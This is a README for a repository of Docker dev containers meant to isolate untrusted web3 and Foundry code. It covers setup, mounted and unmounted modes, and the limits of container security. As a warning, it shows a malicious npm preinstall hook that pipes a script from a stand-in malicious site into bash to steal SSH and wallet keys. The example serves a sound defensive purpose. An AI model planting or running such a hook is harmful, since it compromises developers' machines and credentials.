Important: This repo is a work in progress
A repo to help you run code in a safer manner in the web3 ecosystem. You open up your code in an isolated docker environment so you have a smaller chance of getting hacked.
Important: This isn't a fail-safe! There is no 100% secure way to run code you are unfamiliar with. But running code in an isolated environment is at least much better.
You can read more about the importance of sandboxing, containers vs VMs, and more in the Red Guild Blog.
So you don't get rekt, big dog.
Imagine you're auditing a suspicious smart contract and it has a package.json
that includes a malicious preinstall script:
{
"name": "suspicious-contract",
"scripts": {
"preinstall": "curl -s http://some-malicious-site.com/steal.sh | bash"
}
}
If you run npm install on your host machine, you'll essentailly be running a bash script from a random website on your machine! It could do things like:
- The script could steal your private keys from
~/.ssh
- Steal encrypted keys from
~/.foundry
- Install malware somewhere in your files
- Literally anything
But in a dev container:
- The script is isolated to the container environment
- Can't access your host files unless explicitly mounted
- Even if it installs malware, it's confined to the container
- When you're done, you can destroy the container without affecting your host
The container provides a disposable, isolated environment where you can more safely examine and run suspicious code.
- When you're auditing code that you're not sure you trust
- When you get an interview and the interviewer asks you to download and run some code (by the way, this is usually a scam anyways)
- When you're going to download some suspicious packages
- Or really, whenever you work on any project at all so that you isolate your dev environment from your host machine
- Docker
- Must have installed on your local OS:
docker
anddocker-buildx
. - You'll know you have it installed if you can run
docker --version
in your terminal and you get an output likeDocker version xx.x.x, build xxxxxxxx
(x
are numbers)
- Must have installed on your local OS:
- VSCode
- DevContainer extension by MS:
ms-vscode-remote.remote-containers
Please see VSCode or Raw Docker for more detailed instructions.
git clone https://github.com/Cyfrin/web3-dev-containers
cd web3-dev-containers
Please see VSCode or Raw Docker for more instructions.
Note
unmounted
: This means that all the code we work with will be destroyed once we stop the container. This is the safest way to work with code. There are times when we want to save our code, you can see those instructions in themounted
section in the Usage section. If you want to save the changes you make to your code back to your host computer, you can use themounted
version of the dev container.
- Open the
foundry/unmounted
folder in VSCode
After you clone this repo, open the web3-dev-containers/foundry/unmounted
folder in VS Code.
code ./foundry/unmounted # If you have the `code` terminal command installed
# Otherwise, you can just do `File` -> `Open Folder` and select the `web3-dev-containers` folder
- Run
Dev Containers: Reopen in Container
from the command palette
To get to the command pallette, you can use the following shortcuts:
- Windows/Linux:
Ctrl+Shift+P
- macOS:
Cmd+Shift+P
Then type Dev Containers: Reopen in Container
and select it.
You should get opened up into a new window that looks like this:
You should be at /workspace
folder.
- You can then clone a project into the
projects
folder and start working on it
git clone https://github.com/Cyfrin/foundry-fund-me-cu # Example project
cd foundry-fund-me-cu
forge build
forge test
Now, you can start working on the project knowing you're in a safer environment!
- Tear down
When you're done, you can delete the docker container in your docker dashboard, or run docker ps
on your host machine, not inside your dev container to get the container ID and run docker stop <container-id>
to stop the container.
To do it via the CLI, back on your host machine run:
docker ps # You'll get an output of different running docker containers
docker stop <container-id> # Replace <container-id> with the container ID of the dev container
# If you're sure you don't want any stopped containers, you can then optionally run:
docker system prune # And then `y` to confirm
# Be sure you actually want to run this
This will delete all traces of the code you worked on in that container!
Please see the Quickstart for a quick guide on how to use this with VSCode on a new project.
If you want to persist your code changes back to your host machine, take these steps instead of what you saw in the quickstart:
- Open the
foundry/mounted
folder in VSCode - Run
Dev Containers: Reopen in Container
from the command palette - Work in the
projects
folder - any changes here will be saved to your host machine - The container will still protect you from malicious scripts, but be careful what you save back to your machine
Note The code will be saved to your host machine's file structure, so just remember to not run anything from that folder before you're sure it's safe!
To use these containers with an existing project:
- Copy the
.devcontainer
folder to your project (mounted or unmounted):
cp -r web3-dev-containers/foundry/MOUNTED_UNMOUNTED/.devcontainer /path/to/your/project/
-
Open your project's folder in VSCode
-
Open in a new dev container
Run Dev Containers: Reopen in Container
For users who are not using VSCode.
To run on a mounted volume:
# Build the container
cd foundry/mounted/.devcontainer
docker build -t foundry-dev .
# Run with your project mounted
docker run -it -v /path/to/your/project:/workspace/projects foundry-dev
- Build the container:
cd web3-dev-containers/foundry
docker build -t foundry-dev .
- Run your project in the container
docker run -it foundry-dev
cd workspace
git clone your-project-url
Running a docker container is not a panacea! There are a lot of things to consider when working with Docker containers.
For example:
Network Access:
- Container has full network access, so they could do things like try to send information about your docker container out
Mount Points:
- If you're using mounted files, malware can read everything in your files
Resource Limits:
- No memory/CPU restrictions could mean the malware could try crash your computer
Here is a list of more considerations
Using a dev container is not a 100% secure way to run code you are unfamiliar with. It is a safer way to run code, but it is not foolproof. You may still want to be nervous about running code you're unfamiliar with! There are a number of exploits to be aware of, including:
- Network access: Unless you restrict network access in your docker container, it can still access the internet. This means it can still send data to a remote server.
- Resource constraints: Docker containers can still use up all your CPU and memory if you're not careful. You can also adjust your
Dockerfile
to account for these. - Docker escape exploits: There can still be ways to escape a docker container and access your host machine. These are rare, but they do exist.
There are a few things to consider that we've more or less covered for you in this repo, but important to know:
- Never run a docker container with a
root
user, this is why we use thevscode
user in theDockerfile
- Volume mounting: If you mount a volume from your host machine, the container can access your host machine's files. Be careful what you mount! This is why the default here is
unmounted